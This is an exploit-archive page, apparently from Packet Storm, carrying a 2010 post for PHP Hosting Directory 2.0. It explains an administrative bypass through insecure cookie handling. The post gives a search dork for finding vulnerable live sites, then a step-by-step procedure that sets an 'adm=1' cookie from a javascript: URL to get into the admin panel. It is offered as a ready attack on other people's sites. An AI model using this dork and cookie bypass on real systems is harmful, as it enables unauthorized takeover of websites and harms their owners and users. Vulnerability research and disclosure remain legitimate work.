exploit the possibilities

PHP Hosting Directory 2.0 Insecure Cookie

PHP Hosting Directory 2.0 Insecure Cookie
Posted Oct 11, 2010
Authored by ruiner_blackhat

PHP Hosting Directory version 2.0 suffers from an insecure cookie vulnerability that allows for administrative bypass.

tags | exploit, php, insecure cookie handling
MD5 | 1cf901823df8228875d9cc63adfa8d70

PHP Hosting Directory 2.0 Insecure Cookie

Change Mirror Download
-----------------------------------------------------------------------                                                                 
#### ## ##
####o ##
####X .@##% ##@@#@ ## #@ @# @##@ ###%##X X##@
##@## ##@X#% ##@X##% ## ## ## ##X@## ###X@## o##@##
o# ## ## ## ## ### ## X# ## ## o## ### ## @## ##%
%# ## ##X ## ### ## # #@ X## ### ## ###X###
## ## X##@ ## ### ## #X #X %### ### ## #######
## @#o ### ## ### ## #@%#o @#o%## ### ## ###
######X ##@ ## ### ## %### ## ## ### ## ### ###
##X.@#@ # ### ## ### ## o### ## ## ### ## @##o##@
#@ ## #@X##X ## ### ## ### ##X@## ### ## ##@##
#X ## @##% ## ### ## X##% %#@@## ### ## ###X
-----------------------------------------------------------------------


-----------------------------------------------------------------------
-----------------------------------------------------------------------
ByPass PHP Hosting Version 2
-----------------------------------------------------------------------
-----------------------------------------------------------------------

-----------------------------------------------------------------------
# Exploit Title: [Php Hosting Admin Bypass]
# Date: [2010.10.10]
# Author: [ruiner_blackhat]
# Version: [Versin 2]
# My Group Web: [www.ashiyane.org/forums]
-----------------------------------------------------------------------
Hi
With this exploit you how to bypass the admin panel will hear
php hosting versin 2
-----------------------------------------------------------------------
Initially following dork in your searches:

Dork: "powered by PHP Hosting Directory 2.0"

After selecting one of the sites compiled by the admin panel.for example:

site.com/admin

Do not write anything in the password.
Enter the code below url and press enter.

javascript:document.cookie = "adm=1; path=/";

After being loaded with the error page and check back to refresh and
enter the portal panel Admin.
-----------------------------------------------------------------------

GoodLucK ;)

http://www.ashiyane.org/forums

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

June 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    1 Files
  • 2
    Jun 2nd
    2 Files
  • 3
    Jun 3rd
    19 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    15 Files
  • 6
    Jun 6th
    12 Files
  • 7
    Jun 7th
    11 Files
  • 8
    Jun 8th
    1 Files
  • 9
    Jun 9th
    1 Files
  • 10
    Jun 10th
    15 Files
  • 11
    Jun 11th
    15 Files
  • 12
    Jun 12th
    15 Files
  • 13
    Jun 13th
    8 Files
  • 14
    Jun 14th
    16 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close